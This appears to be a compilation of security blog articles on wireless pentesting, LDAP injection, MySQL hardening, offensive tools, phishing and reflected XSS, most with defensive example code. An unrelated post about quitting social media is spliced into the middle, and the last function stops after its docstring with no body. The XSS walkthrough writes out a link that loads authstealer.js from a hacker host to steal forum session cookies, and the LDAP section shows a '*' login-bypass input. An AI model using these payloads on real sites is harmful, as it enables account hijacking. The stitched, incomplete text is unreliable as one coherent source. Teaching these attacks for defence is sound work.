What is Wireless Pentesting?

Wi-Fi, the way most of us reach the internet, is radio: a wireless router emits electromagnetic fields (EMFs) that carry data between devices without cables. Our lives have moved online. Buying and selling, learning and teaching, paying and receiving, almost everything can now be done over the internet, and a wireless router is one of the most common ways to get there. Wi-Fi extends what computer systems can do by letting them connect and communicate with each other over radio rather than wire. Communication between devices is essential for sharing data, but is it safe or secure? Maybe, maybe not. Nothing is secure until deliberate steps have been taken to secure it, and wireless is no exception.

Before moving ahead, let's think about what wireless security and wireless pentesting actually mean.

Nothing that has ever been built is entirely free of flaws, and wireless is no different. Wireless security means protecting our network so that we are safe from the threats that exist whenever we use the internet. In other words, wireless security is the prevention of unauthorized access to a computer system or network so that nobody suffers a loss. The internet keeps expanding, and so do the dangers that travel across it. For the sake of our own privacy and peace of mind, a secure network matters.

Now let's move on to wireless pentesting. Before security can be applied to something, it is necessary to analyze where it is needed: to find the vulnerabilities or flaws in a system so that they can be patched. In layman's terms, that is pentesting. Penetration testing is a process in which a tester, an authorized hacker, tries to break into a computer system in order to find the vulnerabilities that would let an attacker in, so that they can be patched before somebody else finds them. Wireless pentesting is the same idea applied to a wireless network: the process of drawing out the vulnerabilities that could let an attacker join or eavesdrop on a network and harm its users.

We've discussed the meaning of wireless pentesting; now let's ask why it is necessary.

The growing digital world can make your work efficient, and it can also harm you. An excess of anything is dangerous, and that applies to networks as well. In an age of constant cybercrime it is necessary to keep your distance from harm, so let's look at what can happen on an insecure wireless network. Knowledge spreads, and wherever it reaches there is someone who misuses it; attackers who do so are often called black hat hackers. An attacker who gets onto your network can do a great deal of damage. One destructive attack is the man-in-the-middle (MITM) attack, in which the attacker positions themselves between two systems and controls the flow of data between them without the knowledge of the actual users or owners. Another is the KRACK attack (Key Reinstallation Attack), which does not crack the Wi-Fi password at all: it abuses a flaw in the WPA2 four-way handshake to make a client reinstall an already-used key, which lets an attacker within radio range decrypt, and in some configurations inject, traffic to that client. Either way, an attacker who controls an insecure wireless network or device can sniff the sensitive data you send and receive (credentials, payment card details, identity documents) and use it against you, whether to demand a ransom or to hurt you or someone you care about. None of these outcomes is good.

Lightweight Directory Access Protocol (LDAP) injection


LDAP is a protocol that lets applications talk to directory servers (Active Directory, OpenLDAP and the like) that store user IDs, password hashes, group memberships and computer accounts. When an application builds an LDAP search filter or distinguished name by concatenating user input and sends it to the directory, an attacker can supply filter metacharacters such as *, (, ) and \ to change the meaning of the query: bypassing a login check, enumerating accounts, or reading attributes the application never meant to expose. This is LDAP injection, the directory-service counterpart of SQL injection.

Some examples of LDAP coding issues include:

  • Excess privileges assigned to the LDAP service account the application binds with, so that a successful injection reads or writes far more than the application ever needs
  • No validation of user input and no escaping of filter metacharacters before a value is placed into a query
  • No dynamic (runtime) checks on the constructed query, such as rejecting a filter whose structure differs from the expected template
  • No static source code analysis to find the string concatenation that builds the queries in the first place
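As an added example, not code from the original page, here is the vulnerable string concatenation beside an RFC 4515-escaped version, run against a tiny in-memory filter evaluator so that the effect of the injection is visible without a directory server. The evaluator, the sample directory and the login filter shape are all constructed for this illustration; real applications should authenticate with an LDAP bind rather than comparing userPassword in a filter, and should prefer their LDAP library's own escaping routine where one exists.

```python
import re

# Metacharacters that RFC 4515 requires to be escaped inside a filter value.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter(value: str) -> str:
    """Escape a user-supplied value so it can only ever be a literal inside a filter."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable: raw user input is concatenated into the filter string."""
    return f"(&(uid={username})(userPassword={password}))"


def build_login_filter_safe(username: str, password: str) -> str:
    """Hardened: every user-controlled value is escaped before interpolation."""
    return (f"(&(uid={escape_ldap_filter(username)})"
            f"(userPassword={escape_ldap_filter(password)}))")


# Minimal in-memory LDAP filter evaluator (assumption: &, |, ! and attr=value
# with '*' wildcards are enough to show what injection does to a query).

def _parse(s: str, i: int):
    """Parse one parenthesised filter starting at s[i]; return (node, next_index)."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if s[i] in "&|!":
        op, i, children = s[i], i + 1, []
        while s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError(f"expected ')' at {i}")
        return (op, children), i + 1
    j = s.index("=", i)          # simple item: attr=value, value ends at ')'
    k = s.index(")", j)
    return ("=", s[i:j], s[j + 1:k]), k + 1


def _unescape(piece: str) -> str:
    """Turn \\xx hex escapes back into the literal characters they stand for."""
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), piece)


def _value_matches(pattern: str, actual: str) -> bool:
    """'*' is a wildcard; everything else (after unescaping) matches literally."""
    regex = ".*".join(re.escape(_unescape(p)) for p in pattern.split("*"))
    return re.fullmatch(regex, actual, re.IGNORECASE) is not None


def _eval(node, entry: dict) -> bool:
    if node[0] == "&":
        return all(_eval(c, entry) for c in node[1])
    if node[0] == "|":
        return any(_eval(c, entry) for c in node[1])
    if node[0] == "!":
        return not _eval(node[1][0], entry)
    _, attr, value = node
    return any(_value_matches(value, v) for v in entry.get(attr, []))


def search(directory: list, filter_str: str) -> list:
    """Return the DNs of entries matching filter_str; raise on a malformed filter."""
    node, end = _parse(filter_str, 0)
    if end != len(filter_str):
        raise ValueError("trailing data after filter")
    return [e["dn"] for e in directory if _eval(node, e)]


# Constructed sample directory. Real directories do not expose userPassword for
# comparison in a filter; authenticate with an LDAP bind instead.
DIRECTORY = [
    {"dn": "uid=alice,ou=people,dc=example,dc=com",
     "uid": ["alice"], "userPassword": ["hunter2"]},
    {"dn": "uid=bob,ou=people,dc=example,dc=com",
     "uid": ["bob"], "userPassword": ["correct horse battery"]},
]


def login(username: str, password: str, safe: bool = True) -> list:
    """Simulated login: which DNs does the constructed login filter match?"""
    builder = build_login_filter_safe if safe else build_login_filter_unsafe
    return search(DIRECTORY, builder(username, password))


if __name__ == "__main__":
    print(login("alice", "hunter2"))        # legitimate login
    print(login("*", "*", safe=False))      # injection: wildcard matches everyone
    print(login("*", "*", safe=True))       # escaped: '*' is now a literal, nobody matches
```

With the unsafe builder a username and password of "*" turn the login filter into (&(uid=*)(userPassword=*)), which matches every entry; the escaped builder sends (&(uid=\2a)(userPassword=\2a)) and matches nothing. The same escaping also neutralises the ")(" sequences an attacker uses to splice extra clauses into the filter.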

What is Network Security?


In a vulnerable world it is necessary to take steps to protect ourselves, whether against a disease, an accident, or a flaw in a system we depend on.

One of the most important parts of modern life is the network. In the digital world almost everything happens over a network: viewing and advertising, purchasing and selling, learning and teaching. It is therefore necessary to secure the network so that all of its users can keep themselves protected.

Now the first question that comes to our mind is “What is network security?”

Network security is the set of measures we follow to protect ourselves from threats to the integrity, confidentiality and availability of our data. These measures apply to hardware (firewalls, switches, access points) as well as to software. Effective and sufficient controls allow secure and efficient access to the network. The main objective of network security is to find the flaws and vulnerabilities in a network and fix them, so that users are given a connection they can trust.

Before following any step, a person always wonders as to why is network security necessary or important?

The most important reason is the number of attacks that users fall victim to while they are online. There is a huge variety of attacks used to disrupt a network. Some of the most common ones we need to protect against are: malware, which is deployed to disrupt, damage or gain unauthorized access to a network or computer system; botnets, in which many private computers are infected with malicious software so that they can be controlled together, without their owners' knowledge, to launch further attacks; and denial of service (DoS), in which an attacker floods a system or server with traffic until it overloads, drops its connections or crashes. Sometimes the victim is an entire organization, because the attacker has enough resources to compromise many systems at once regardless of the effort required. In May 2017 a huge number of systems running Microsoft Windows were compromised all over the world by a single attack, the WannaCry ransomware, which spread on its own by exploiting a flaw in the SMBv1 service for which Microsoft had already published a patch (MS17-010). It encrypted the data on infected systems and the operators demanded a ransom in bitcoin in return for the victims' own data. The attack was estimated to have affected more than 200,000 computer systems across 150 countries, with total damage estimated at anywhere from hundreds of millions to billions of dollars.

One more question worth asking is: what harm can an attacker actually cause that makes network security worth the effort?

The most important reason for implementing network security is the damage an attacker can do to you or your systems. An attacker can sniff every username and password you use on different accounts, capture credit or debit card details and use them to steal money from you, misuse your social security number, steal and misuse your sensitive data, and steal your identity to impersonate you while committing serious crimes. There are also purpose-built devices that make this easier. The LAN Turtle is a covert USB Ethernet adapter that blends in physically with other network equipment and gives an attacker persistent remote access to the network it is plugged into, from behind the perimeter firewall. The Bash Bunny is a USB attack platform that impersonates a keyboard, a storage device or a network adapter when plugged into a computer; it runs scripted payloads that can deliver malware, open a shell on the host and exfiltrate whatever information the attacker wants. The LAN Tap is a passive network tap that, inserted into an Ethernet run, copies all the traffic flowing through it for capture and analysis. A passive tap cannot modify traffic in transit, and properly encrypted traffic stays unreadable to whoever holds it; what it exposes is every protocol that is still sent in the clear.

All of this leads to the same conclusion: network security is essential in today's digital lifestyle if we want to use the internet to its full extent without suffering a loss.

How to Improve MySQL Security: Top 10 Ways


In the pantheon of open source heavyweights, few technologies are as ubiquitous as the MySQL RDBMS. Integral to popular software packages like WordPress and server stacks like LAMP, MySQL is the foundational data platform for a large share of the websites and cloud services on the internet today. Unfortunately, its popularity also means its attack vectors and security exploits are widely known. The following are 10 ways to shore up MySQL security and protect your data more effectively.

10 Ways to Improve MySQL Security

1. Drop the Test Database

The test database created by mysql_install_db (and by older installers) is accessible to every account by default, which makes it a convenient place for an attacker to stage data or try out privileges. Remove it during post-installation hardening (DROP DATABASE test, which the mysql_secure_installation script also offers to do) and delete the leftover rows for it from the mysql.db privilege table, otherwise the open grant silently applies again to any database later named test or test_something.

2. Remove All Anonymous Accounts

Older MySQL installations create anonymous accounts (an empty user name on localhost) that serve no purpose after installation. They should be removed (DROP USER ''@'localhost'), since they let anyone who can reach the server log in with no credentials at all and are an easy entry point into the database.

3. Obfuscate the Root Account

Renaming the MySQL root account to a hard-to-guess name (RENAME USER 'root'@'localhost' TO a name of your choosing) adds a small layer of obscurity, as attackers must determine the new account name before they can start brute-forcing its password. It is no substitute for a strong, unique password on that account, and for not allowing it to connect from the network at all.

4. Disable Remote Logins

If only local applications use the MySQL database, remote access to the server should be disabled. This is done by opening /etc/my.cnf and adding a skip-networking entry under the [mysqld] section. With that set, MySQL stops listening on any TCP/IP port, including 127.0.0.1, and accepts only local Unix socket connections. If some local client genuinely needs TCP, the alternative is bind-address=127.0.0.1, which keeps the listener off every other interface.

5. Change Default Port Mappings

MySQL listens on port 3306 by default, and opportunistic attackers and scanners try default values first, so some guides recommend moving it to another port after installation. Treat this as obscurity only: a port scan that grabs banners will still identify the service, so a non-default port is at best a minor nuisance for automated scanners and never a replacement for access control.

6. Remove and Disable the MySQL History File

The MySQL client's history file, ~/.mysql_history, is written automatically by the interactive mysql client and records every statement typed, including CREATE USER, GRANT ... IDENTIFIED BY and SET PASSWORD statements that carry plaintext passwords from installation and configuration sessions. Delete it, then stop it from being recreated: either export MYSQL_HISTFILE=/dev/null in the shell profile of every account that uses the client, or create ~/.mysql_history as a symbolic link to /dev/null (ln -s /dev/null ~/.mysql_history). Recent clients try to redact statements that look like they contain passwords, but do not rely on that; assume anything typed at the prompt can end up on disk.

7. Do Not Run MySQL With Root Level Privileges

Run mysqld under a dedicated, unprivileged account (the mysql user that the packages create) rather than directly as root, by setting user=mysql under [mysqld] or in the service unit. mysqld itself refuses to start as root unless explicitly told to with --user=root, for good reason. The point is damage limitation: a vulnerability in the server, or abuse of file-reading and file-writing statements such as LOAD DATA INFILE and SELECT ... INTO OUTFILE, is then confined to what that account can read and write instead of the whole host. It also makes file ownership and audit trails clearer.

8. Alter Which Hosts Have Access to MySQL

If MySQL runs as a standalone server (i.e., application and web servers query the database from other machines), the instance should be configured to accept connections only from the permitted hosts. The classic way to do this is with TCP wrappers, via the hosts.deny and hosts.allow files, but not every MySQL build honours them, so do not rely on that alone: restrict the listener with bind-address, filter port 3306 at the host firewall so only the application servers can reach it, and scope every MySQL account to the host it connects from ('app'@'10.0.1.5' rather than 'app'@'%').

9. Limit or Disable SHOW DATABASES

Again, stripping remote attackers of their information-gathering capabilities matters. Adding skip-show-database to the [mysqld] section of /etc/my.cnf makes SHOW DATABASES succeed only for accounts that hold the global SHOW DATABASES privilege, so a compromised low-privilege account cannot enumerate what else lives on the server.

10. Disable the Use of LOAD DATA LOCAL INFILE Command

LOAD DATA LOCAL INFILE lets the server pull a file from the client machine, which means a malicious or compromised server can read arbitrary files from any client that has local_infile enabled; and the non-LOCAL LOAD DATA INFILE lets an account with the FILE privilege read files on the server host, which is a well-known follow-on to SQL injection. Unless an application genuinely needs it, disable it by adding local_infile=0 to the [mysqld] section of my.cnf (local-infile=0 is equivalent; MySQL treats dashes and underscores in option names interchangeably). The set-variable=local-infile=0 form still found in old guides uses syntax that was removed years ago, and a current server will refuse to start on it.
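The settings in items 4, 5, 7, 9 and 10 all live in the [mysqld] section of my.cnf, and the two most common mistakes are the obsolete set-variable spelling and a listener that still accepts connections from every interface. As an added example, not part of the original article, this script parses a my.cnf fragment and reports which of those settings are missing or weak, with a constructed weak configuration and a corrected one to run it against. The option names are MySQL's own; the finding codes and the parsing rules (dash and underscore treated as equivalent, a bare option name treated as an enabled flag) are assumptions of this example.

```python
LOCALHOST_BINDS = {"127.0.0.1", "localhost", "::1"}
DISABLED = {"0", "OFF", "FALSE"}


def parse_mysqld_options(text: str) -> dict:
    """Return the [mysqld] options from a my.cnf, option names normalised to underscores.

    MySQL accepts '-' and '_' interchangeably in option names, and a bare name
    such as `skip-networking` is a boolean flag (recorded here as "ON").
    """
    options, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue
        key, sep, value = line.partition("=")
        options[key.strip().lower().replace("-", "_")] = value.strip() if sep else "ON"
    return options


def audit_mysqld(text: str) -> list:
    """Return (code, message) findings for the hardening items that are config settings."""
    opts = parse_mysqld_options(text)
    findings = []
    if "set_variable" in opts:
        findings.append(("OBSOLETE_SYNTAX",
                         "set-variable= was removed long ago; write name=value directly"))
    networked = "skip_networking" not in opts
    if networked and opts.get("bind_address", "0.0.0.0") not in LOCALHOST_BINDS:
        findings.append(("REMOTE_LOGIN", "server accepts TCP connections from other hosts"))
    if networked and opts.get("port", "3306") == "3306":
        findings.append(("DEFAULT_PORT", "listening on 3306 (obscurity only; low value)"))
    if "skip_show_database" not in opts:
        findings.append(("SHOW_DATABASES", "SHOW DATABASES not restricted to privileged accounts"))
    # Older releases default local_infile to ON; treat 'not explicitly disabled' as a finding.
    if opts.get("local_infile", "ON").upper() not in DISABLED:
        findings.append(("LOCAL_INFILE", "LOAD DATA LOCAL INFILE not explicitly disabled"))
    if opts.get("user", "root") == "root":
        findings.append(("RUNS_AS_ROOT", "no unprivileged user= set; confirm the service unit"))
    return findings


def finding_codes(text: str) -> list:
    """Just the sorted finding codes, convenient for comparisons."""
    return sorted(code for code, _ in audit_mysqld(text))


# Constructed configurations for illustration.
WEAK_MY_CNF = """
[mysqld]
port = 3306
user = root
set-variable = local-infile=1   # obsolete spelling: a current server refuses to start

[client]
port = 3306
"""

HARDENED_MY_CNF = """
[mysqld]
user = mysql
skip-networking            # Unix socket only; or bind-address=127.0.0.1 if TCP is needed
skip-show-database
local_infile = 0
port = 3307
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_MY_CNF), ("hardened", HARDENED_MY_CNF)):
        print(name)
        for code, msg in audit_mysqld(cfg) or [("OK", "no findings")]:
            print(f"  {code}: {msg}")
```

Running it prints six findings for the weak fragment and none for the hardened one. A bind-address of 127.0.0.1 clears the remote-login finding while leaving the default-port note in place, which is the right priority: the listener's reach matters, the port number barely does.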

8 Offensive Security Tools for SysAdmins


Metasploit Framework – an open-source framework for exploit development and penetration testing, well known throughout the security community. It ships exploits for both server-side and client-side attacks, along with feature-packed post-exploitation payloads (Meterpreter) that make pwning systems fun. Armitage, a separate GUI front-end, adds point-and-click network exploitation on top of the framework. This is the go-to tool if you want to break into a network or computer system.

Defending against Metasploit :

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.

Ettercap – a suite of tools for man-in-the-middle (MITM) attacks. Once you have placed yourself in the middle with Ettercap (typically by ARP poisoning), use its modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords is just the beginning; inject to exploit FTW!

Defending against Ettercap :

  • Understand that ARP poisoning is not difficult on a typical switched network; switching alone does not stop it.
  • Lock down unused network ports.
  • Use secure switch configurations (Dynamic ARP Inspection, DHCP snooping, port security) and NAC if the risk is sufficient.

sslstrip – using HTTPS makes people feel warm, fuzzy, and secure. sslstrip attacks that security by intercepting the initial plain-HTTP request and keeping the victim's side of the connection on unencrypted HTTP while it talks HTTPS to the real site, so all the traffic is readable. Banking details, passwords, and emails from your boss, all in the clear. It even includes a nifty feature that replaces the favicon on the unencrypted connection with a padlock, just to keep the user feeling warm and fuzzy.

Defending against sslstrip :

  • Be aware of the possibility of MITM attacks (ARP poisoning, rogue proxies or gateways, wireless).
  • Deploy HTTP Strict Transport Security (HSTS), ideally on the preload list, so the browser never makes the initial plain-HTTP request that sslstrip depends on.
  • Look for sudden protocol changes in the browser bar. Not really a technical mitigation!

evilgrade – another man-in-the-middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the update check and serves the user a not-so-good update instead. At the time of writing it could exploit the update functionality of around 63 pieces of software including Opera, Notepad++, VMware, VirtualBox, iTunes, QuickTime and Winamp! It really whips the llama's ass!

Defending against evilgrade :

  • Be aware of the possibility of MITM attacks (ARP poisoning, rogue proxies or gateways, wireless).
  • Only perform updates to your system or applications on a trusted network.
  • If you ship software: fetch updates over TLS and have the client verify a signature on the update before installing it, so a spoofed server cannot substitute its own.

Social-Engineer Toolkit (SET) – makes building a social-engineered client-side attack far too easy. It creates the spear-phishing message, sends the email and serves the malicious exploit. SET is the open-source client-side attack weapon of choice.

Defending against SET:

  • User awareness training around spear-phishing attacks.
  • Strong email and web filtering controls.
  • Phishing-resistant multi-factor authentication, so a harvested password alone is not enough.

sqlmap – SQL injection is an attack vector that has been around for well over a decade, yet it is still the easiest way to get dumps of entire databases. sqlmap is not only a highly accurate tool for detecting SQL injection; it can also dump information from the database and, where the database permits it, escalate to operating system shell access on the vulnerable host.

Defending against sqlmap :

  • Use parameterized queries (prepared statements) everywhere; validate input on top of that, never instead of it.
  • Use ModSecurity or another web application firewall (WAF) to help block injection attempts, while remembering that WAFs are often bypassed and are a supplement, not a fix.

aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools for capturing, injecting and cracking that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP; it is broken and can be cracked in minutes.
  • When using WPA2 with pre-shared keys, use a long, non-dictionary passphrase (10+ characters is a floor, not a target), and disable WPS.
  • Prefer WPA3 where your clients support it.

oclHashcat – need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. It supports a long list of hash types (oclHashcat has since been merged into hashcat, which supports several hundred) and uses the GPU on your graphics card, if supported, to find those passwords many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce length over complexity rules, and screen out known-breached passwords.
  • Protect the hashed passwords; a hash store that never leaks cannot be cracked offline.
  • Salt the hashes with a unique per-user salt, and use a deliberately slow algorithm (bcrypt, scrypt or Argon2) rather than a fast one such as MD5 or SHA-1.
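As an added example, not from the original article or from the hashcat project, the following contrasts an unsalted fast hash, which is exactly what hashcat is built to crack, with a salted scrypt hash stored in a self-describing format and checked by a constant-time verifier. The storage format, the cost parameters and the constructed sample passwords are assumptions of this example.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

# scrypt cost parameters: N=2**14, r=8 uses about 16 MiB per hash. Raise N as
# hardware allows; the stored string records the parameters so old hashes stay verifiable.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def naive_md5(password: str) -> str:
    """Unsalted fast hash: identical passwords collide, rainbow tables apply,
    and a GPU cracker tests billions of candidates per second against it."""
    return hashlib.md5(password.encode()).hexdigest()


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted scrypt hash in a self-describing 'scrypt$N$r$p$salt$key' format."""
    salt = salt if salt is not None else os.urandom(16)   # unique per user, per hash
    key = hashlib.scrypt(password.encode(), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${_b64(salt)}${_b64(key)}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored parameters and salt; compare in constant time."""
    try:
        algo, n, r, p, salt_b64, key_b64 = stored.split("$")
        if algo != "scrypt":
            return False
        salt, expected = base64.b64decode(salt_b64), base64.b64decode(key_b64)
        key = hashlib.scrypt(password.encode(), salt=salt,
                             n=int(n), r=int(r), p=int(p), dklen=len(expected))
    except (ValueError, TypeError):
        return False          # malformed record: fail closed, never raise on login
    return hmac.compare_digest(key, expected)


if __name__ == "__main__":
    # Constructed sample: two users who happen to share a password.
    print(naive_md5("hunter2") == naive_md5("hunter2"))        # True: the store leaks that fact
    first, second = hash_password("hunter2"), hash_password("hunter2")
    print(first != second)                                    # True: salts differ
    print(verify_password("hunter2", first), verify_password("hunter3", first))
```

The salt defeats precomputation and hides which users share a password; the scrypt cost is what turns hashcat's billions of guesses per second into a few thousand, which is the only lever that actually buys time once a hash store has leaked.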

No Social Media, No Cellular Data


As we confront the onset of 2020 with the force of a charging bull, it feels apt to formally document my New Year’s Resolutions for this year.

I’ve distilled my aspirations into two, but they carry a significant weight.

Truthfully, these transformative changes have been simmering in my thoughts for several months, if not years. Both are centered around refining how I interact with computers, enhancing my overall quality of life and happiness.

The essence of computing should enrich our lives, improve them, and elevate our happiness. If any aspect of the technological landscape—hardware, software, services, or features—contributes to discomfort, perhaps it’s time to contemplate letting it go.

My inaugural Resolution for 2020 is a seemingly simple yet essential shift that I’ve passionately advocated for throughout my journey, as followers of my timeline may already be aware.

No More Social Media.


Indeed, I am resolving to eliminate social media from my life entirely. This encompasses platforms such as X, Facebook, LinkedIn, Reddit, YouTube, and their equivalents. No more engaging in posting, reading, liking, commenting, or re-sharing content on any of these services or their analogs. While I’ll maintain the accounts to prevent impersonation, they will be closed off from active use.

I am convinced that the concept of Social Media is inherently flawed. This realization has been percolating in my mind for quite some time. Regrettably, I found myself succumbing to the addictive nature of these platforms, only to conclude that they do not contribute a net positive impact on my life, both personally and publicly.

Tried to quit social media in 2019.  I failed.

In 2020, I’m embarking on another attempt at redefining my online presence. While I bid farewell to Social Media, I must note that my departure from these platforms doesn’t equate to a complete disconnection from the digital realm (yes, I still hyphenate that word). I will maintain accessibility through email, both the traditional Internet version.

Anticipating a spectrum of reactions, some will assert, “Impossible!” while others will confidently declare, “So easy! I already do that!” There might even be a handful lurking in the corners of the globe, crafting random mean or snarky remarks on X. The beauty of it all? I won’t be privy to any of it. So, feel free to snark away — it’s all good from my perspective.

Honestly, I’m guessing I won’t be the only one with such a resolution for 2020… here’s hoping we all succeed.

No More Cellular Data Service.

As my second New Year’s Resolution, I’m taking a decisive step by discontinuing cellular data. This means bidding farewell to smartphones equipped with ever-present Internet connections, be it an iPhone with 4G, an Android phone with 5G, or even a Linux-oriented phone boasting a speculative 17G connection (or whatever G designation they decide on by the close of 2020).

I find modern smartphones’ “always connected” nature to be stress-inducing and negatively impacting my quality of life.  While there are certainly some benefits… the negative aspects of being constantly connected are simply too strong. I’ll still let myself have a phone.  But my phone… will just be a phone. When I’m walking around town, I have no Internet connection.  I’ll be offline without sitting at my computer (“In the real world”).

Maybe I'll have two devices: one PDA (I'm bringing that acronym back) and one phone. Perhaps I'll settle on a single PDA-Phone (just without any 2G/3G/4G/5G/whatever connection). I haven't decided on that part yet.

Thus far, things have gone relatively smoothly.  Over the coming days, I’ll keep my smartphone turned off and see if any problems crop up.  I’m sure there will be some inconveniences — we’ve all gotten so used to smartphones with always-on data connections — but I am anticipating, based on how it has gone so far, an overall positive experience leading up to January 1st.

Does anyone expect to be on their deathbeds and have their final thought be, “Darn, wish I would have liked a few more things on X?”  Or, “I wish I would have spent more time surfing the web on my cell phone while at dinner with my family?”

Will these changes positively impact my life and overall happiness (which is already pretty high, but why not shoot for even better)? Will any inconveniences crop up that are insurmountable? Will I experience gains (or losses) in productivity?

What is Spear Phishing?


Phishing is a cyber attack that gathers sensitive information such as login credentials, credit card numbers, bank account numbers or other financial details by masquerading as a legitimate website or email. Personal information like social security numbers, phone numbers and social media account details are also common targets for cybercriminals who commit identity theft.

Phishing scams use social engineering, usually a sense of urgency, to trick victims. Once the victim opens a phishing email or text message and clicks the malicious link, they are taken to a fake website that mimics the legitimate one and captures whatever they type.

Common phishing attempts clone financial institutions, emails from colleagues, social media sites, and online payment processors.

Despite being one of the oldest cyber crimes, phishing remains a significant threat to many organizations because of its sheer volume and the sophistication of modern campaigns. Increasingly, phishers research their targets in advance and tailor the message to a specific person or role, referencing real colleagues, projects or suppliers. This targeted form is spear phishing, and it is far more effective than the generic bulk variety precisely because the message looks like something the recipient expected to receive.

Phishing emails may also carry infected attachments that install malware such as ransomware, or that give the attacker a foothold from which to reach sensitive data and cause a data breach. Security awareness training is one of the best ways to reduce this risk, alongside technical controls such as multi-factor authentication and email filtering.

It's important to remember that some of the most significant data breaches start outside your own organization. If your third-party vendors have access to sensitive data, it is just as essential that they educate their staff about phishing risks. Third-party, fourth-party and vendor risk related to phishing must be part of your third-party risk management framework and vendor risk management program.

Cross-site Scripting (XSS) Attacks


What is Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a common attack vector in which an attacker injects malicious script into the pages served by a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injection) in that it does not directly target the application itself; the users of the web application are the ones at risk, because the injected script runs in their browsers with the privileges of the site. A successful cross-site scripting attack can have devastating consequences for an online business's reputation and its relationship with its clients.

Depending on the severity of the attack, user accounts may be compromised, Trojan horse programs activated, and page content modified, misleading users into willingly surrendering their private data. Finally, session cookies could be revealed, enabling a perpetrator to impersonate valid users and abuse their personal accounts.

Cross-site scripting attacks are traditionally broken down into two types, stored and reflected (a third, DOM-based XSS, occurs entirely in client-side code and is handled in the browser rather than on the server).
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into the vulnerable web application's data (a comment, a profile field) and is served to every user who later views that content.
Reflected XSS involves bouncing a malicious script off a web application into a user's browser. The script is embedded in a link and is only activated once that link is clicked.

Reflected Cross-Site Scripting (XSS) Attacks


What is a reflected XSS attack

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the visitor's browser. The script is delivered through a link that sends a request to a vulnerable website, which echoes part of that request (a search term, an error message, a parameter value) back into the page. The vulnerability is typically the result of the application not validating incoming input and, above all, not encoding it for the HTML context in which it is written out, which lets the attacker's markup be interpreted as script rather than text.

To distribute the malicious link, a perpetrator typically embeds it in an email or on a third-party website (e.g., in a comment section or on social media). The link sits behind anchor text that provokes the user to click it, which sends the XSS request to the vulnerable website, reflecting the attack back to the user.

Unlike a stored attack, where the perpetrator must find a website that allows the permanent injection of malicious scripts, a reflected attack only requires that the malicious script be embedded in a link. That said, for the attack to succeed the user needs to click on the infected link.

As such, there are a number of key differences between reflected and stored XSS attacks, including:

  • Reflected attacks are more common.
  • Reflected attacks do not have the same reach as stored XSS attacks.
  • Reflected attacks can be avoided by vigilant users.

With reflected XSS the perpetrator plays a numbers game, sending the malicious link to as many users as possible to improve the odds that enough of them click it.

Reflected XSS Attack

While visiting a forum site that requires users to log in to their accounts, a perpetrator submits the search query <script type='text/javascript'>alert('XSS');</script> and observes the following:

  1. The query produces an alert box saying: "XSS".
  2. The page source contains "<script type='text/javascript'>alert('XSS');</script> not found.", i.e. the query was written into the HTML without any output encoding.
  3. The page's URL reads http://forum.com?q=<script type="text/javascript">alert('XSS');</script>, so the payload travels in a GET parameter that can be placed in a link.

This tells the perpetrator that the website is vulnerable. Next, he creates his own URL, which reads

http://forum.com?q=news<script%20src="http://hackersite.com/authstealer.js"></script>

and embeds it as a link in a seemingly harmless email, which he sends to a group of forum users.

While the sending address and subject line may look suspect to some recipients, that does not mean the link won't be clicked.

In fact, even if only one in every 1,000 recipients clicks the link, a large mailing still yields several dozen infected forum users. They are taken to the forum's website, where the malicious script is reflected back into their browsers and, because it runs in the forum's origin, can read their session cookies and let the perpetrator hijack their forum accounts.
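As an added example that is not part of the original article, the following reproduces the forum search page from the walkthrough above as a constructed Python template and renders the query both unencoded (the vulnerable behaviour the perpetrator found) and HTML-encoded with the standard library, attaching a Content-Security-Policy header as defence in depth. The template, the respond() helper and the probe strings are constructed for this illustration; the authstealer.js URL is the one the walkthrough uses. The template places the query in two contexts, a double-quoted attribute and body text, which is why escaping with quote=True matters.

```python
import html

# Constructed search-page template: the query is written into an attribute value
# (the search box keeps the term) and into the page body (the "not found" message).
SEARCH_TEMPLATE = (
    "<html><body>\n"
    '<form action="/search"><input name="q" value="{q}"></form>\n'
    "<p>{q} not found.</p>\n"
    "</body></html>"
)

# Defence in depth: even if encoding is missed somewhere, inline script is refused.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    "X-Content-Type-Options": "nosniff",
}


def render_search_unsafe(q: str) -> str:
    """Vulnerable: the query is reflected into both contexts exactly as received."""
    return SEARCH_TEMPLATE.format(q=q)


def render_search_safe(q: str) -> str:
    """Hardened: HTML-encode for the element/attribute contexts used here.
    quote=True also encodes " and ', which is what stops the attribute breakout.
    JavaScript or URL contexts would need their own encoders, not this one."""
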